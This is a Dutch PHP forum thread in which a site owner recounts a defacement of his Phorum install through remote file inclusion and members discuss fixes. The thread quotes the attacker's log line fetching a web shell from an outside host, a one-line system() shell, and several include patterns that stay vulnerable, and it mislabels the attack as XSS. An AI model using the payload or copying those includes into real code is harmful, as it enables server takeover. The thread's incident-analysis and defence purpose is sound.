Veiligheidsbreuk, gehacked, XSS

Overzicht Reageren

Sponsored by: Vacatures door Monsterboard

PHP developer (Laravel, Docker, Gitlab-CI)

Functie Het IT-team bestaat momenteel uit 4 ontwikkelaars. Ieder onderdeel van de software draait op aparte servers en het bestaat dus echt uit verschillende componenten intern ontwikkeld en je werkt aan alle facetten. Van uitbreiding van de core tot maatwerk voor de klant. Ook liggen er verschillende uitdagingen op servervlak en databases. Je zult de eerste periode veel samenwerken met de lead developer om vervolgens echt je gang te gaan binnen de software. Een groot deel van de systemen is gebouwd met behulp van het Laravel framework en PHP (minimaal 7.2), Docker voor lokaab gebruik en Gitlab-CI voor het deployen

Bekijk vacature »

Mendix Developer

For our client in Amsterdam, we are looking for a Senior Mendix Developer. Company description Our client is an IT Consultancy company who’s been active for 10 years now. With their ambitious team, they are working with different clients in order to help them with analyzing their data and giving advice to them, regarding how they can use their data in the smartest ways, or to make sure that their mobile or web applications are working efficiently. As you get a glimpse of various industries, it is guaranteed that no day will be the same. Job description As a Mendix

Bekijk vacature »

PHP developer

Functie omschrijving Voor een klein bedrijf in de buurt van Nieuwegein zijn wij per direct op zoek naar een talentvolle PHP developer. Er wordt veel ruimte geboden voor eigen initiateven, waardoor je een mooie stempel kan drukken op jouw eigen werkzaamheden (zowel operationeel als strategisch). Het bedrijf heeft middels externe programmeurs een multimedia platform ontwikkeld, maar willen geleidelijk de ontwikkeling naar binnen halen. Om die reden zoeken zij een communicatieve interne PHP developer die graag meebouwt aan het succesvolle product. Je gaat de volgende werkzaamheden verrichten: Platform beheren en programmeren (PHP, MySQL, JQuery, Javascript, XML & HTML); Communicatie en aansturing

Bekijk vacature »

Senior Lead Front End Developer

Functieomschrijving Voor Stichting Waternet zijn wij op zoek naar een senior Lead Front End Developer. Binnen het DevOps team Online zijn we op zoek naar een Senior Lead Front End developer met kennis van toegankelijkheid. Deze developer zal zich bezighouden met development van webpaginas die in verbinding staan met systemen uit het back office. Taken Ontwerpen, ontwikkelen, implementeren, documenteren en beheren van webapplicaties in een Azure-omgeving Debuggen, analyseren en oplossen van problemen in de OTAPomgevingen Je participeert in het DevOpsTeam Online voor het verder uitwerken en implementeren van gebruikerswensen Je bent betrokken bij toegankelijkheid audits en het implementeren van WCAG

Bekijk vacature »

PHP Developer

Functie omschrijving Als PHP Developer ga jij aan de slag met uitdagende software projecten. Jij gaat in deze functie software applicaties ontwikkelen. Deze software projecten zijn heel divers, en deze organisatie maakt software, van A tot Z. Klanten kunnen in elke sector werkzaam zijn, van profit tot non-profit. Deze software bouw je vooral in PHP en specifiek Laravel. Dit framework kent dus geen geheimen voor jou. De software die jij gaat ontwikkelen is heel divers, van urenregistratiesystemen tot compleet geautomatiseerde tools. In deze veelzijdige functie ga jij je zeker niet vervelen, elke dag bestaat weer uit nieuwe uitdagingen. Bedrijfsprofiel Deze

Bekijk vacature »

Front-end developer gezocht

Functie Je komt in een team met ambitieuze developers die de passie voor Front-End met jou delen. Samen ga je aan de slag met leuke en leerzame opdrachten. Het team heeft een eigen budget en financiën en zij bepalen zelf hoe dat besteed en investeert wordt. Je gebruikt tools als JavaScript, Node.js, React, Angular, Typescript en Vue.js wanneer je werkt aan de opdrachten. Daarnaast zul je veel leren van je collega’s en gezamenlijk een leuke tijd doorbrengen tijdens activiteiten zoals wintersport, hackatons en conferentiebezoeken. Je krijgt niet alleen de mogelijkheid Front-End te ontwikkelen, maar ook vooral jezelf. Dit kan behaald

Bekijk vacature »

Software developer - C Sharp

Functie omschrijving Heb jij interesse in het programmeren en ontwikkelen van software? En heb jij enige ervaring met Oracle databases en PL/SQL? Wij zijn voor een leuke opdrachtgever in omgeving Naaldwijk op zoek naar een software ontwikkelaar die graag werkt met C#, JAVA of Oracle. Wij zoeken iemand die breed inzetbaar is en die aan veel verschillende applicaties wilt werken. Als software developer werk je met je collega's samen in een leuk en informeel team aan het (her)ontwerpen van bedrijfssystemen. Je houdt je bezig met het ontwikkelen van REST API's en je onderhoudt applicaties in Oracle PL/SQL en APEX. Vind

Bekijk vacature »

Front-end Developer

Front-end Developers opgelet! Bij Luminis zijn ze opzoek naar jou. Lees de vacature en solliciteer direct. Luminis is een software- en technologiebedrijf met meerdere vestigingen. Vanuit deze vestigingen werken 200 professionals aan technisch hoogwaardige oplossingen voor klanten zoals KLM, Nike en Bol.com. Ook ontwikkelt Luminis eigen oplossingen op het gebied van cloud, Internet of Things, data intelligence, e-sports en e-learning. Luminis onderscheidt zich door aantoonbaar voorop te lopen in technologie en innovatie. Luminis heeft drie kernpunten die verankerd zitten in alles wat we doen: het omarmen van nieuwe technologie, meesterschap en kennis delen. Functiebeschrijving First things first! Het is belangrijk

Bekijk vacature »

Back-End Developer in Laravel / PHP

Functie omschrijving Wij zijn op zoek naar een Medior PHP Laravel Developer voor een gaaf bedrijf in de omgeving van Amsterdam! Voor een enthousiast team die zich graag bezig houdt met softwareontwikkeling zijn wij op zoek naar versterking. Je werkt in een klein ontwikkelteam en bent zeer betrokken bij alle aspecten van de softwareoplossingen. Van het ontwerpen tot de oplevering. Binnen deze functie ga je aan de slag met het aanpassen, verbeteren en vernieuwen van de logistieke oplossingen. Je krijgt veel te maken met koppelingen naar systemen en de verzoeken van de klant. Je komt terecht in een team, waarbij

Bekijk vacature »

PHP developer (Symfony, Doctrine)

Functie Als PHP developer wordt er een hoge mate van zelfstandigheid verwacht, maar ook dat je goed opereert in een team waar kennis wordt gedeeld en dingen als codereviews erg veel voorkomen. Kwaliteit staat voorop, mede hierom werken ze bijvoorbeeld zonder echte deadlines in hun sprints. De SaaS-applicatie wordt volledig ontwikkeld in PHP en Symfony. De module bestaat uit een stuk informatie verrijking en intelligentie wat resulteert in een medische check. De logica wordt daarom in de code geïntrigeerd. Je bent onder andere bezig met complexe databases waar meer dan 80.000 medicijnen op verschillende niveaus in staan, die maandelijks worden

Bekijk vacature »

Social Media Specialist

Social Media Specialist locatie: Rotterdam (Zuid Holland) Wij zoeken op korte termijn een nieuwe collega, een social media specialist/ adviseur sociale media (24 uur), voor ons sprankelende team Communicatie van CJG Rijnmond. Onze focus ligt op het informeren en binden van onze in- en externe klanten en stakeholders en het versterken van onze naamsbekendheid en zichtbaarheid. Dat doen we in nauwe samenwerking met elkaar. Over de functie Ons team bestaat uit 7 communicatieprofessionals met ieder een eigen expertise. Als lid van het online team ben je verantwoordelijk voor het ontwikkelen, uitvoeren en analyseren van onze socialemediastrategie. Ook stel je campagnes

Bekijk vacature »

Software ontwikkelaar ASP .Net / C#

Functie omschrijving Gezocht! Software ontwikkelaar. Ben jij bekend met termen als ASP .Net, C# en SQL? Ben jij op zoek naar een afwisselende en uitdagende IT-functie binnen de agrarische sector? En omschrijf jij jezelf als zelfstandig, enthousiast en proactief? Dan hebben wij de perfecte functie voor jou! Als Software ontwikkelaar binnen deze organisatie ben je samen met één andere collega verantwoordelijk voor de ontwikkeling en modificatie van het support en controle programma dat binnen dit bedrijf gebruikt wordt. Je gaat hierbij bijdragen aan de vertaling van klantwensen naar effectieve softwareoplossingen. Verder bestaan je werkzaamheden uit: Technische uitwerking van de business

Bekijk vacature »

C# Ontwikkelaar

In het kort Als C# .NET Core ontwikkelaar ga je binnen onze business unit Transport en Logistiek aan de slag complexe maatwerk software voor bedrijf kritische systemen binnen de technische automatisering. Denk bijvoorbeeld een IoT-oplossing voor de logistieke sector waarbij we van ruim 200.000 machines de telemetrie en events verwerken. We zijn actief in de distributielogistiek, havenlogistiek en productielogistiek. Naast C# en .NET Core maken we ook gebruik van Azure technologie. En als trotse Microsoft Gold Partner leren we graag van en met jou. Wil jij jezelf blijven ontwikkelen binnen de technische automatisering met .NET, dan gaan we deze uitdaging

Bekijk vacature »

Fasttrack learning & development voor Java dev

Wat je gaat doen: Wij zoeken enthousiaste en ambitieuze junior en medior ontwikkelaars die toe zijn aan de volgende stap in hun carrière. Wij helpen je op je pad naar senior ontwikkelaar door ons fasttrack learning en development programma. Na een kort en intensief programma ga jij aan de slag bij klanten van DPA. Daarnaast krijg je veel ruimte om je te ontwikkelen als persoon en als specialist. De eerste maand gaan we aan de slag om je certificeringen te behalen waaronder OCP (Oracle Certified Professional). Daarnaast nemen we een deepdive in Spring Boot. Ook laten we je kennismaken met

Bekijk vacature »

C# developer

Functie Als ervaren Software Engineer wordt jij verantwoordelijk voor het bedenken en ontwikkelen van technische (maatwerk) oplossingen voor onze klanten en dit samen met de klant af te stemmen. Jij wordt o.a. verantwoordelijk voor de doorontwikkeling het software pakket welke voor ons enorm belangrijk is. Dit pakket zorgt er namelijk voor dat wij complete productielijnen kunnen aansturen en monitoren. Daarnaast heb jij actief contact met onze hoofdvestiging om het software achter een van onze systemen te verbeteren en te herschrijven. Momenteel zijn onze C# applicaties geschreven met o.a. Winforms. Echter hebben wij de actieve ambitie om dit te gaan herschrijven

Bekijk vacature »
Arend a

Arend a

12/07/2004 05:07:00
Quote Anchor link
Een veiligheidbreuk, een goede daad uit het echte leven.

Ik roep al een redelijke tijd dingen over veiligheid, en nu ik even niet kan slapen ga ik deze kennis ook maar met jullie delen. Gisteren rond een uur of negen werd op vorago.nl een stukje php code: phorum gedefaced door een rus. Een kleine vier uur later heb ik dit forum offline gehaald en ben eens gaan kijken wat er eigenlijk aan de hand was.

De rus in kwestie gaat alsvolgd aan het werk, de eerste http request is:

vorago@vh1:~$ cat onderzoek|head
[09/Jul/2004:20:19:21 +0200] "GET /phorum/admin/ HTTP/1.1" 200 5042 "http://www.google.com/search?hl=en&lr=&ie=UTF-8&q=inurl%3Aphorum%2Fadmin+%223.3.2a%22&btnG=Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Opera 7.51 [ru]"

en vervolgens de exploit:

[09/Jul/2004:20:22:34 +0200] "GET /phorum/admin/actions/del.php?include_path=http://deface2.narod.ru/shep.php&cmd=ls HTTP/1.1" 403 7591 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Opera 7.51 [ru]"

de shep.php is een file met:
Code (php)
PHP script in nieuw venster Selecteer het PHP script
1
2
3
<?
system($cmd);
?>


Dit werkt alsvolgd: het forum include eerst de text-only shep.php, gaat deze lokaal uitvoeren en voert dit uit. Dit is het welbekende XSS symtroom: cross site scripting. Hierbij is dus een shell vergeven aan de scriptkiddo. Daar sta ik even van te kijken. Achteraf ben ik blij dat er niet zo gek veel kwaad is geschied. Toch had hij met even doorpielen een mysql wachtwoord kunnen ontfutselen, en door zich niet zo enorm groot en wijd een forum te defacen (wat ik persoonlijk buitengewoon zielig vind) had ik er zelfs niet eens achter gekomen.

Dit is een resultaat van een 3rd party script wat ik niet goed beheerd heb, dit is erg slecht. Doch, ik ben weer wakker geschud. Verder heeft de scriptkiddie in kwestie nog wat rond zitten neuzen bij andere scripts, zonder resultaat.

In het kort komt het hier op neer:
een phpfile fout.php met:
Code (php)
PHP script in nieuw venster Selecteer het PHP script
1
2
3
<?
include($_POST["naam"]);
?>


wordt aangeroepen met:
http://www.jouwsite.nl/fout.php?naam=http://www.mijnsite.com/exploit.php?commando=ls

waarin exploit.php

Code (php)
PHP script in nieuw venster Selecteer het PHP script
1
2
3
<?
system($_POST["commando"]);
?>


!OF WAT VOOR PHP CODE DAN OOK! bevat.

Wat de oplossing hiervoor is?
persoonlijk gebruik ik preg_replace om mijn invoer te sanatizen.

Code (php)
PHP script in nieuw venster Selecteer het PHP script
1
2
3
4
5
6
7
8
9
<?
$pad
= "/home/pad/naar/file";
$variabele = $_POST["naam"];
$variabele = preg_replace('/\W','', $variabele);
# zorg dat er alleen letters mogen voorkomen in de variabele.
if (file_exists("${pad}/${variabele}.ext")) {
  include("${pad}/${variabele}.ext");
}

?>


Conclusie: wees alert, niet overmoedig en blijft sanatizen.
Tot mijn schaamte kwam ik een bovenaande compleet foute constructie tegen in een scriptje dat ik 'even' geschreven heb voor het includen in mijn layout. Het 'even' iets doen en niet nauwkeurig zijn kan fataal zijn voor je site. Gelukkig heb ik reguliere backups, ook van mysql en zit ik hier redelijk safe. Maar het is gewoon doodzonde om veel werk door een paar eikels teloor zien gaan.
 
PHP hulp

PHP hulp

29/03/2024 00:29:10
 
B a s
Beheerder

B a s

12/07/2004 08:09:00
Quote Anchor link
omg :) maar goed dat je er achter bent gekomen.. maar was 'system()' dan functioneel op je server??
 
SerpenT

SerpenT

12/07/2004 11:37:00
Quote Anchor link
hoe kun je system() dan uitschakelen? op je server? want dit wil ik niet op mijn site laten gebeuren:O.

en nog iets arend:

Code (php)
PHP script in nieuw venster Selecteer het PHP script
1
2
3
<?
include($_POST["naam"]);
?>


wordt aangeroepen met:
http://www.jouwsite.nl/fout.php?naam=http://www.mijnsite.com/exploit.php?commando=ls

bedoel je hiet niet
Code (php)
PHP script in nieuw venster Selecteer het PHP script
1
2
3
<?
inculde($_GET["naam"]);
?>

of pakt ie die meegestuurde variabele in de url ook als $_POST["naam"] :O
 
Arend a

Arend a

12/07/2004 11:58:00
Quote Anchor link
Het was laat :)

Maar het system commando uitschaken kan wel, maar dan zjin er nog wel 4 andere manieren om er omheen te kunnen. Je moet gewoon zorgen dat er geen malafide include() verwijzingen zijn.

Grtz,

Arend
Gewijzigd op 12/07/2004 11:59:00 door Arend a
 
Mitch X

Mitch X

12/07/2004 12:00:00
Quote Anchor link
Je laat dat toch nooit zo doen?
Ik deed dat altijd met een switch() die kon dus nooit iets anders dan de door mij ingegeven files.

Nu werk ik niet meer met includes maar das een ander verhaal :)
 
Arend a

Arend a

12/07/2004 12:02:00
Quote Anchor link
mja, dat vind ik persoonlijk nogal lomp. een beetje voor elke file in mn php file gaan pielen. Maar zoals je staat was het een quick fix van twee jaar terug die nog steeds liep.

Verder was de eerste hack een 3rd party script: phorum dat hij dmv googlen ging opzoeken en exploiten.
Gewijzigd op 12/07/2004 12:08:00 door Arend a
 
Bram Z

Bram Z

12/07/2004 13:08:00
Quote Anchor link
Die rus ziet er een profesional uit die moet mijn site niet weten :D
 
Arend a

Arend a

12/07/2004 13:10:00
Quote Anchor link
Professional? Welnee, het is een eerste klas scriptkiddo. Ik heb totaal geen respect voor deze gast. Hij was op de hoogte van een lek, en ging sites opzoeken die die software draaide om te hacken.

Sorry, geen enkel respect at all.
 

19/09/2005 19:52:00
Quote Anchor link
Quote:
Een veiligheidbreuk, een goede daad uit het echte leven.

Ik roep al een redelijke tijd dingen over veiligheid, en nu ik even niet kan slapen ga ik deze kennis ook maar met jullie delen. Gisteren rond een uur of negen werd op vorago.nl een stukje php code: phorum gedefaced door een rus. Een kleine vier uur later heb ik dit forum offline gehaald en ben eens gaan kijken wat er eigenlijk aan de hand was.

De rus in kwestie gaat alsvolgd aan het werk, de eerste http request is:

vorago@vh1:~$ cat onderzoek|head
[09/Jul/2004:20:19:21 +0200] \"GET /phorum/admin/ HTTP/1.1\" 200 5042 \"http://www.google.com/search?hl=en&lr=&ie=UTF-8&q=inurl%3Aphorum%2Fadmin+%223.3.2a%22&btnG=Search\" \"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Opera 7.51 [ru]\"

en vervolgens de exploit:

[09/Jul/2004:20:22:34 +0200] \"GET /phorum/admin/actions/del.php?include_path=http://deface2.narod.ru/shep.php&cmd=ls HTTP/1.1\" 403 7591 \"-\" \"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Opera 7.51 [ru]\"

de shep.php is een file met:
Code (php)
PHP script in nieuw venster Selecteer het PHP script
1
2
3
<?
system($cmd);
?>


Dit werkt alsvolgd: het forum include eerst de text-only shep.php, gaat deze lokaal uitvoeren en voert dit uit. Dit is het welbekende XSS symtroom: cross site scripting. Hierbij is dus een shell vergeven aan de scriptkiddo. Daar sta ik even van te kijken. Achteraf ben ik blij dat er niet zo gek veel kwaad is geschied. Toch had hij met even doorpielen een mysql wachtwoord kunnen ontfutselen, en door zich niet zo enorm groot en wijd een forum te defacen (wat ik persoonlijk buitengewoon zielig vind) had ik er zelfs niet eens achter gekomen.

Dit is een resultaat van een 3rd party script wat ik niet goed beheerd heb, dit is erg slecht. Doch, ik ben weer wakker geschud. Verder heeft de scriptkiddie in kwestie nog wat rond zitten neuzen bij andere scripts, zonder resultaat.

In het kort komt het hier op neer:
een phpfile fout.php met:
Code (php)
PHP script in nieuw venster Selecteer het PHP script
1
2
3
<?
include($_POST[\"naam\"]);
?>


wordt aangeroepen met:
http://www.jouwsite.nl/fout.php?naam=http://www.mijnsite.com/exploit.php?commando=ls

waarin exploit.php

Code (php)
PHP script in nieuw venster Selecteer het PHP script
1
2
3
<?
system($_POST[\"commando\"]);
?>


!OF WAT VOOR PHP CODE DAN OOK! bevat.

Wat de oplossing hiervoor is?
persoonlijk gebruik ik preg_replace om mijn invoer te sanatizen.

Code (php)
PHP script in nieuw venster Selecteer het PHP script
1
2
3
4
5
6
7
8
9
<?
$pad
= \"/home/pad/naar/file\";
$variabele = $_POST[\"naam\"];
$variabele = preg_replace(\'/\\W\',\'\', $variabele);
# zorg dat er alleen letters mogen voorkomen in de variabele.
if (file_exists(\"${pad}/${variabele}.ext\")) {
  include(\"${pad}/${variabele}.ext\");
}

?>


Conclusie: wees alert, niet overmoedig en blijft sanatizen.
Tot mijn schaamte kwam ik een bovenaande compleet foute constructie tegen in een scriptje dat ik \'even\' geschreven heb voor het includen in mijn layout. Het \'even\' iets doen en niet nauwkeurig zijn kan fataal zijn voor je site. Gelukkig heb ik reguliere backups, ook van mysql en zit ik hier redelijk safe. Maar het is gewoon doodzonde om veel werk door een paar eikels teloor zien gaan.
 
Han eev

Han eev

19/09/2005 20:31:00
Quote Anchor link
Waarom doen ze dit?? wat hebben ze eraan?
 
Alfred -

Alfred -

19/09/2005 20:42:00
Quote Anchor link
Waarom worden er virussen gemaakt? Wat heb je er aan als je aan ander zn pc naar de kloten helpt? Juist ja, nog onnuttige vragen Han?
 
Jelmer -

Jelmer -

19/09/2005 20:55:00
Quote Anchor link
1 keer en nooit weer (neem ik aan)
Hoe simpel het ook is eigenlijk.

Ik moet toegeven dat ik ook een paar keer een site ben tegengekomen, waarvan ik dacht 'deze is makkelijk te bewerken'. Dus ben toen even gaan knutselen, en inderdaad, ook zo'n include (andere was trouwens een .inc bestand met wachtwoorden :*) ). Enige verschil is dat ik alleen heb gekeken, en daarna een mailtje heb gestuurd naar de desbetreffende webmaster.

Sterker nog, ik heb een keer (per ongeluk, was niet mijn bedoeling) toegang verkregen tot alle websites die op mijn webhosting werden gehost. Echt asociaal groot lek. Heb het gemeld (even paar screenies voor bewijs, wachtwoorden weggehaald) en blij dat ze waren! Krijg nog een cadeautje ervoor ook :P

Ik had natuurlijk ook al die wachtwoorden op internet kunnen zetten, maar dat wat ik nu heb gedaan voelt toch beter. Lees je dat rus?
 
Pieter van Linschoten

Pieter van Linschoten

19/09/2005 21:16:00
Quote Anchor link
Code (php)
PHP script in nieuw venster Selecteer het PHP script
1
2
3
4
5
6
7
8
9
<?
if (is_file($_GET['page'].".php"))
{

$include = $_GET['page'];
}
else{
$include = "Home";
}

include($include.".php");
?>
Gewijzigd op 19/09/2005 21:16:00 door Pieter van Linschoten
 
Legolas

Legolas

19/09/2005 21:25:00
Quote Anchor link
misschien moet je dat maar eerst ff vertalen voordat ie het kan lezen Jelmer ^^... En scriptkiddies, die zijn te zielig om sociaal te zijn =P.

Maar system is volgens mij overal geblokt ?. OW ennem wat ik me nou afvraag: hoe kan het in cluden van zo'n bestand nou werken? Ik bedoel de server waar het van komt parsed het ook... Of gaat dat via zielige geocities servers die geen php hebben =P.

Overigens is dit misbruik maken van de hosting, een beetje host wil dan nog wel eens een contract ontbinden =P. http://www.nic.ru/whois/?domain=narod.ru =P.

MJa, ik filter die gets altijd op slashes enzo, dan kunnen urls ook nie =). Net zoals ik tegen sql injection alle tekens van html-entities voorzien (inc. enkele quotes ej: htmlentities($_GET["var"], ENT_QUOTES);)

Mja, er is altijd wel iets =(
 
Eris -

Eris -

19/09/2005 21:28:00
Quote Anchor link
Gana we even oude koeien uit de sloot halen (Topic is een jaar oud)
 
Jelmer -

Jelmer -

19/09/2005 21:52:00
Quote Anchor link
ehe, dat had ik nog niet eens gezien. Stom

Dat van Lapidi lijkt mij ook niet echt veilig. Daarmee kan ik nog steeds cross-site scripten en ieder willekeurig bestand includen. Gewoon .php weglaten.
 
Winston Smith

Winston Smith

20/09/2005 00:02:00
Quote Anchor link
Ik gebruik altijd
Code (php)
PHP script in nieuw venster Selecteer het PHP script
1
2
3
4
<?php
// eerst mapje ervoor zetten
include('include/' . $page . '.inc.php');
?>


Dat is toch redelijk veilig, of zie ik iets over het hoofd?

(ook al is het een oud topic ^^)
 
Willem Jan Z

Willem Jan Z

20/09/2005 00:31:00
Quote Anchor link
Met die vraag zit ik eigenlijk ook... Ik dacht gewoon controleren of het bestand wel bestaat...

ik doe wel altijd uizonderingen maken voor bestanden op mijn server, zoals de config enzo... Zodat die niet opgehaald kunnen worden...

Maar dat is dus niet echt veilig blijkbaar...
Ga ik maar eens beetje aan werken...
 
Legolas

Legolas

20/09/2005 07:36:00
Quote Anchor link
gewoon punten en slashes eruit halen dan kan er geen url komen en blijft het in dezelfde map, kan je dus niet ../config.php doen =).
 
Jelmer -

Jelmer -

20/09/2005 07:40:00
Quote Anchor link
inderdaad. Of hem door een switch() / array van bestaande pagina's heen halen.
 
Legolas

Legolas

20/09/2005 08:11:00
Quote Anchor link
dan het beste een in_array, een switch is een beetje te veel werk :P
 



Overzicht Reageren

 
 

Om de gebruiksvriendelijkheid van onze website en diensten te optimaliseren maken wij gebruik van cookies. Deze cookies gebruiken wij voor functionaliteiten, analytische gegevens en marketing doeleinden. U vindt meer informatie in onze privacy statement.